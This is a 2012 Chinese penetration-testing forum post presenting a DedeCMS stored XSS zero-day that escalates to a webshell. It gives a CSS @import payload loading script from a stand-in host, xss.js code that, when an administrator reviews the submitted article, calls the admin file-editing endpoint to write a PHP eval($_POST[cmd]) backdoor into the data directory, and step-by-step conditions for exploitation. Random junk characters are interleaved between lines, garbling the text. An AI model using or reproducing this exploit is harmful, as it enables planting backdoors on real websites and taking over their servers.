中国网络渗透测试联盟
标题:
dedecms xss oday通杀所有版本 可getshell
[打印本页]
作者:
admin
时间:
2012-9-15 13:56
标题:
dedecms xss oday通杀所有版本 可getshell
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
* p0 Z/ {: T+ ]
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
+ d& ]5 A$ T N$ @" U; p
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
! v- A2 i7 V2 H% j% D8 s
下面说说利用方法。
- p+ H8 t1 F9 W! y: s
条件有2个:
/ Z. T) @6 J) C1 g' `4 ~
1.开启注册
5 A: r. ]- O: f+ }
2.开启投稿
$ H4 u. R9 E! G* w& K" d
注册会员----发表文章
1 Z7 K# C' f5 ~, B) ~
内容填写:
3 ?& T- {6 r& U
复制代码
/ j3 n9 _4 l9 e$ u* M o& Z3 G( C- \6 ^
<style>@im\port'\
http://xxx.com/xss.css';
</style>
1 H J, {' _- D! _, p
新建XSS.Css
5 d0 S: v# n. w! |
复制代码
$ l. c E/ U2 B% t1 n
.body{
4 }# Y5 ?1 g0 ]- X: q; g
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
9 `3 G2 S5 _! q+ `( u, J; C
新建xss.js 内容为
. m# h! Y* _5 U: E9 z& z! s' v. A
复制代码
& C' P2 ^% n9 b5 D D
1.var request = false;
3 H; L6 R2 B' O( h, j
2.if(window.XMLHttpRequest) {
2 }" [+ G7 d5 O
3.request = new XMLHttpRequest();
5 h$ o3 t4 w( R; l7 y9 o: t
4.if(request.overrideMimeType) {
) o/ r% i( c# \0 d8 l8 D
5.request.overrideMimeType('text/xml');
! j' y( I% v8 V3 Y6 \
6.}
# q( o: b' \* p- d0 @ j
7.} else if(window.ActiveXObject) {
6 U( x2 C$ H% X* F. i" [4 B
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
# o9 {$ |" a5 a0 p$ j. H; t
9.for(var i=0; i<versions.length; i++) {
: ?& d, j( {" H: E1 h. u3 f5 S
10.try {
Z5 F: j. F# U, P# [/ V
11.request = new ActiveXObject(versions);
2 u; Y% u+ a6 d+ i1 K$ x
12.} catch(e) {}
- @# }/ Z% v! v# Z
13.}
+ x& Y7 a& c A/ @1 a* c
14.}
2 n6 w+ E" R" Y
15.xmlhttp=request;
) ]1 H) Y6 n# A
16.function getFolder( url ){
, ~" T9 v0 L, i
17. obj = url.split('/')
0 H* R6 x9 r6 m+ F% W
18. return obj[obj.length-2]
/ i1 f! i3 k6 K5 n' v
19.}
" z# J6 @' G( S/ S% G1 u
20.oUrl = top.location.href;
7 u e% A# b& N0 `
21.u = getFolder(oUrl);
" _) n* b6 ^9 o/ B* N% ^
22.add_admin();
: K' X, S. X5 ?: q
23.function add_admin(){
' `" p" v: ?- B0 {
24.var url= "/"+u+"/sys_sql_query.php";
. I! n1 I d% l) D7 |
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
2 D. F% }, R6 ?3 \
26.xmlhttp.open("POST", url, true);
2 U% v! \( D# t! z) W- V
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
% I7 u6 U* N( O$ s' V, ?
28.xmlhttp.setRequestHeader("Content-length", params.length);
" b1 \6 n( [& s9 {/ q8 f- Y
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
|: E5 _, c& {* X: I, r+ O. p
30.xmlhttp.send(params);
6 h" j% ^$ K2 j2 }# E3 o1 @
31.}
3 u: L/ P- r( C6 [7 e9 W5 X
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2